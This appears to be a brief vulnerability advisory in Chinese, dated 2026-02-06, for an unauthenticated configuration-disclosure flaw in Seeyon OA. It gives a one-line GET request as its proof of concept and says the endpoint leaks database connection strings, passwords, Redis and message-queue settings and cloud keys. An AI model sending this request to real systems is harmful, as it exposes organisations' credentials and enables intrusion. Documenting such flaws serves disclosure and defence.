致远OA /seeyon/rest/m3/common/system/properties 信息泄露漏洞

2026-02-06 致远OA PoC Public

Description

致远OA系统存在配置信息泄露漏洞,未授权访问者可获取完整的系统配置信息,包括数据库连接串、用户名密码、Redis配置、消息队列密码、云服务密钥等敏感数据。

PoC

GET /seeyon/rest/m3/common/system/properties HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities